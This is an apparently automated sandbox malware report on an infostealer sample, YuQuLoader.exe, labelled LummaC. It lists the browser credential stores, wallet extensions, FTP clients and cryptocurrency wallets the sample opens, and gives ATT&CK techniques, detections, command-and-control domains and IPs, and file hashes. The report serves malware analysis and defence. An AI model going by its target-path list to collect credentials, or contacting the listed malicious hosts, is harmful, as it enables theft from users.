                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
Source: Yara match; File source: 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1558849037.0000000001644000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1557692943.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: YuQuLoader.exe PID: 8668, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 2.2.YuQuLoader.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.YuQuLoader.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix: techniques flagged by the report, with the count the report shows next to each; the remaining cells of the matrix (Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration and Impact columns, and the unnumbered cells elsewhere) carry no hits and are omitted here.

Tactic | Technique | Count
Execution | Windows Management Instrumentation | 12
Persistence | DLL Side-Loading | 1
Privilege Escalation | Process Injection | 211
Privilege Escalation | DLL Side-Loading | 1
Defense Evasion | Virtualization/Sandbox Evasion | 22
Defense Evasion | Process Injection | 211
Defense Evasion | Deobfuscate/Decode Files or Information | 1
Defense Evasion | Obfuscated Files or Information | 4
Defense Evasion | Software Packing | 2
Defense Evasion | DLL Side-Loading | 1
Credential Access | OS Credential Dumping | 2
Discovery | System Time Discovery | 1
Discovery | Security Software Discovery | 251
Discovery | Virtualization/Sandbox Evasion | 22
Discovery | Process Discovery | 1
Discovery | Application Window Discovery | 1
Discovery | File and Directory Discovery | 11
Discovery | System Information Discovery | 33
Collection | Screen Capture | 1
Collection | Archive Collected Data | 1
Collection | Data from Local System | 41
Collection | Clipboard Data | 3
Command and Control | Encrypted Channel | 21
Command and Control | Ingress Tool Transfer | 1
Command and Control | Non-Application Layer Protocol | 3
Command and Control | Application Layer Protocol | 14
Source | Detection | Scanner | Label | Link
YuQuLoader.exe | 41% | Virustotal | | Browse
YuQuLoader.exe | 39% | ReversingLabs | Win32.Exploit.LummaC |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=3d938ea1e907c113ce_146508105965 | 0% | Avira URL Cloud | safe
https://mrodularmall.top/aJ | 100% | Avira URL Cloud | malware
https://mrodularmall.top:443/aNzSMicrosoft | 100% | Avira URL Cloud | malware
https://mrodularmall.top/aNzS | 100% | Avira URL Cloud | malware
https://mrodularmall.top/b | 100% | Avira URL Cloud | malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | Avira URL Cloud | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | Avira URL Cloud | safe
https://mrodularmall.top/ | 100% | Avira URL Cloud | malware
https://mrodularmall.top/aNzS33 | 100% | Avira URL Cloud | malware
https://mrodularmall.top/aNzSrmal | 100% | Avira URL Cloud | malware
https://mrodularmall.top/aR | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
t.me | 149.154.167.99 | true | false | | high
featureccus.shop | 104.21.93.43 | true | false | | high
mrodularmall.top | 104.21.112.1 | true | true | | unknown
astralconnec.icu | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://mrodularmall.top/aNzS | false | Avira URL Cloud: malware | unknown
https://t.me/asdawfq | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.93.43 | featureccus.shop | United States | 13335 | CLOUDFLARENETUS | false
104.21.112.1 | mrodularmall.top | United States | 13335 | CLOUDFLARENETUS | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1635448
                                                                                Start date and time:2025-03-11 17:22:25 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 8m 10s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:14
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:YuQuLoader.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@5/6@4/3
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 91%
                                                                                • Number of executed functions: 17
                                                                                • Number of non-executed functions: 137
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 104.40.69.76, 20.190.159.129, 4.175.87.197, 150.171.28.10, 2.23.227.208
                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobvmssprdwus03.westus.cloudapp.azure.com, g.bing.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                 • Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                 Time | Type | Description
                                                                                 12:23:27 | API Interceptor | 8x Sleep call for process: YuQuLoader.exe modified
                                                                                 12:23:31 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                No context
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):0.7210420381089234
                                                                                Encrypted:false
                                                                                SSDEEP:96:6XF/PesMhwoI7RM6tQXIDcQvc6QcEVcw3cE/H+HbHg/TgJ3YOZUXOyK/ZAX/d5FN:Yte10BU/Aj/+zuiFaZ24IO8e8
                                                                                MD5:D24435447480ADABF582F39E6D2D516E
                                                                                SHA1:B25F02D388E284E549F152745364DD028163C891
                                                                                SHA-256:915D99CAA16A731DBD423DB54458C36A8777E5E44395B69B67FDA3D2D2BC73C7
                                                                                SHA-512:A950612FF08E138183DAA2AA65871A3B8C5EED87D80B6B7471490E4B22B25DEC8FE9E7B11E393CE8DF3C6A5A3E6EBFFC2D3686594D247CD49263267C8AF237E9
                                                                                Malicious:true
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.8.3.8.0.5.1.8.5.6.9.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.8.3.8.0.5.8.2.6.3.2.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.f.1.6.5.7.7.-.9.4.1.3.-.4.d.6.6.-.b.7.3.b.-.8.7.8.2.6.2.7.d.c.e.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.5.a.2.c.3.f.-.7.0.a.6.-.4.6.d.4.-.a.7.1.f.-.7.8.c.3.c.d.1.3.4.9.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.u.Q.u.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.a.0.-.0.0.0.1.-.0.0.1.8.-.9.d.d.e.-.9.a.e.9.a.1.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.d.3.d.c.7.5.d.5.c.7.4.7.b.6.7.5.3.1.b.d.9.5.5.0.5.6.4.9.6.b.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.6.0.e.8.6.b.2.8.b.8.a.7.6.f.d.4.7.a.9.a.3.1.b.7.1.1.b.5.8.4.8.0.0.8.8.b.6.a.a.!.Y.u.Q.u.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 14 streams, Tue Mar 11 16:23:25 2025, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):38066
                                                                                Entropy (8bit):1.7183156707880904
                                                                                Encrypted:false
                                                                                SSDEEP:96:5e89doHl3tb+1tXhyRxlqQMi7O0tWZzt6Aqf4V1aWIkWIe/PIuuEsH4ue7M6uWz1:DX0xkQMO+t6Rf4rUEEsHc75dz
                                                                                MD5:1B08384E307B02D3581D7D73F4658CC3
                                                                                SHA1:1B365C46087FCCCA1A0C23D4035BEDC0808739B9
                                                                                SHA-256:CE30329A2A448D0034B4D16FD17389CEC7616B9D19D7A51000624E22D4BB0D69
                                                                                SHA-512:A38612E991218D6F798CE73FDE7EE220FEFD0DB1EB99185A7022EA4DD624DFDF8599AAB251422DE79F9E8AACF470EC8C07BE065DF1ED0AA2F2E9294F53C3CD88
                                                                                Malicious:false
                                                                                Preview:MDMP..a..... .......}c.g........................0...............f...........T.......8...........T......................................................................................................................eJ......P.......GenuineIntel............T........!..|c.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8402
                                                                                Entropy (8bit):3.698684577626318
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJGje6N8c6YVkfSUdI4gmfRoprp89bd1sfsfm:R6lXJIe616Y6fSUdfgmfRbdOf5
                                                                                MD5:B23C96B311D75A1C0F2F85C2B68CF668
                                                                                SHA1:E37E5C63B97B5CEDA71214D1247CB7BA70F5DFCE
                                                                                SHA-256:36C0B1F9C7D70B4A468E468C03C81B93020013BAAD762AE23E82C22FB32ADA82
                                                                                SHA-512:D4C44C4778395F9FEB29FD825D2769F8A5C8297A9ED4CDDAF710B6F5617767E717B7BCBAD3AD420F524AAC1C4528A9938E61AFDB3534CD19C744BC1E40BDFB21
                                                                                Malicious:false
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.6.0.8.<./.P.i.
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4720
                                                                                Entropy (8bit):4.485358673966274
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zsyJg77aI99qWOa8tQYm8M4JNiF6+q8vxZz0kaFd:uIjfAI7zLOlDJHKzz0kaFd
                                                                                MD5:6A81577556510AE816B3F754FB1D0D08
                                                                                SHA1:1B146B237D8AEF39DCD1BD610751694FF230C8C2
                                                                                SHA-256:691D1DB3DC5BFC528677E04521A77D69E26AF56EBC902B5E86ED01F83003540F
                                                                                SHA-512:82BD57D25E111F9F96B2A88D5ADA6433851E9AC66C54C6D4F23D7FF411FE559CA137729B4C66BAC6EF49DCB0FEA57CAD179EC8331208991A62E47EBB0FE9BD76
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756446" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465272453274313
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4hyS6Wwrm/Ivk8bWdx0W0cAdQa8WMFlnOvAeoMqWu8O/RRhD55dqXanhE:UyJKF0fBvAexuTLdbd5hE
                                                                                MD5:D0146D7329E2A3CC4B3FCB5D6589430B
                                                                                SHA1:CA19AE08FB68992BE9C020140167D005A7A7AE24
                                                                                SHA-256:0EDF0BBBCD221ABB53D9A53E343D6469F0EC06145419B9078F9FBE4D1E3E3A5D
                                                                                SHA-512:D953EF9878FB735BB49367E280D35153E8C450AA27FB6E642298E13AB69FAF89FFB5B64BC7E5DD1FB7DAC07408A3045BE9276C02813A96AC6F03A0932595E553
                                                                                Malicious:false
                                                                                Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................:>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):57344
                                                                                Entropy (8bit):3.588725221045388
                                                                                Encrypted:false
                                                                                SSDEEP:768:F3fG0XLQf5atI6/i63hpHhuhMRPv4tZ0CVY2M2TPA2Gv+svyfRouyNWiW2:F3+0c5atrIG4tMQzA3a2
                                                                                MD5:5C023FDE65E361BEE0DC7F6E40272776
                                                                                SHA1:B11E7F20BB9E59CF918D79D571BCAD92E56053C7
                                                                                SHA-256:68CC42C801079A1342D20FB9F0C9D863FACE451B719AC03A25DBB5F476A05E6C
                                                                                SHA-512:B0FF44B113ECB470C59FFD58BF77E75A72178DA2F8C0A8CF38F2C9E35CD31FC84DC3D2EEE04A732ABFFB0FD59E15C1DB0875A4EEB4DC70F761F0A140ECE02E78
                                                                                Malicious:false
                                                                                Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................<>..HvLE........K...........-S..o:9.f.....3......................................................0..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........@...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. .
                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.688909846433308
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:YuQuLoader.exe
                                                                                File size:1'362'432 bytes
                                                                                MD5:849c830e2af83f171e9607e3d2e7f694
                                                                                SHA1:760e86b28b8a76fd47a9a31b711b58480088b6aa
                                                                                SHA256:350d0f5dba0941904595a2f132cc43af3d23a1a7aa6ee272b9dd0408d2b58022
                                                                                SHA512:188d068bcf78a5873db52fd974e10ec3cd64bc275d2a55de79265549e777d134d8983f7fa378aef0db38f4800656b62d0576ec48c3b334c6fd93eef08e819283
                                                                                SSDEEP:24576:ytDu8+zlhIFWnPszfYWlWknrfRisJrWknrfRisJ:aujhIFWnPszfzAknos8knos
                                                                                TLSH:8E55E17270C1D073FB45A6B235A9E3B4146BF673DA2D0FC7A2B4E33890486D1179A52E
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3.g............................b.............@.......................................@.................................@6..<..
                                                                                Icon Hash:90cececece8e8eb0
                                                                                Entrypoint:0x46e162
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows cui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67D033A8 [Tue Mar 11 12:59:20 2025 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:d462aa757f68629e41b3df6e6d4c6a3c
